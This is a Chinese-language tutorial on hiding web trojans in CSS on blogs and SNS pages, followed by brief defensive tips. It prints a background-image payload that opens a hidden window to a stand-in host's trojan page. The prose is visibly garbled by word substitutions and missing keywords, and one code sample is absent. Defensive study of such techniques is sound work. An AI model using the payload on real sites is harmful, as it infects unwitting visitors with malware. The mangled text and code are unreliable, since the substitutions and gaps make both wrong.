在Web1.0時代，使用E掛馬對于黑客而言，與其說是為了更好地實現木馬的躲藏，倒不如說是無可奈何的一個選擇。在簡樸的HTML網頁和缺乏交互性的網站中，黑客可以利用的手段也非常有限，即使采取了復雜的偽裝，也很輕易被識破，還不如E來得直接和有效。但如今交互式的Web2.0網站越來越多，答應用戶設置與修改的博客、SNS社區等紛紛泛起。這些互動性非常強的社區和博客中，往往會提供豐碩的功能，并且會答應用戶使用CSS層疊樣式表來對網站制作進行自由的修改，這促使了CSS掛馬流行。

　　攻CSS掛馬方式較多，但主流的方式是通過有漏洞的博客或者SNS社交網站系統，將惡意的CSS代碼寫入支持CSS功能的個性化頁面中。下面我們以典型的CSS掛馬方式為例進行講解。

　　方式1：

　　Body

　　“background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式，這段惡意代碼主要是通過“background-image”配合t代碼讓網頁木馬靜靜地在用戶的電腦中運行。

　　那如何將這段CSS惡意代碼掛到正常的網頁中去呢？黑客可以將天生好的網頁木馬放到自己指定的位置，然后將該段惡意代碼寫入掛馬網站的網頁中，或者掛馬網頁所調用的CSS文件中。

　　方式2：

　　Body

　　background-image： url(t：open(“http：//www.X.com/muma.htm”，”newwindow”，”border=”1″ Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no”))

　　方式1的CSS掛馬技術，在運行時會泛起空缺的頁面，影響網頁訪問者正常的訪問，因此比較輕易發現。不外在方式2中的這段代碼，使用了t的Open開窗，通過新開一個躲藏的窗口，在后臺靜靜地運行新窗口并激活訪問網頁溢出木馬頁面，不會影響訪問者觀看網頁內容，因此更加隱蔽。

　　防網絡服務器被掛馬，通常會泛起防病毒軟件告警之類的信息。因為漏洞不斷更新，掛馬種類時刻都在變換，通過客戶真個反映來發現服務器是否被掛馬往往疏漏較大。準確的做法是常常檢查服務器日志，發現異常信息，常常檢查網站代碼，使用網頁木馬檢測系統，進行排查。

　　目前除了使用以前的阻斷彈出窗口防范CSS掛馬之外，還可以在網頁中設置CSS過濾，將CSS過濾掉。不外假如你選擇過濾CSS的話，首先需要注意自己的相關網頁是否有CSS的內容，因此我們仍舊首推用阻斷方式來防范CSS。阻斷代碼如下所示：

　　emiao1：expression(this.src=”about：blank”，this.outerHTML=”")；

　　將外域的木馬代碼的src重寫本錢地IE404錯誤頁面的地址，這樣，外域的t代碼不會被下載。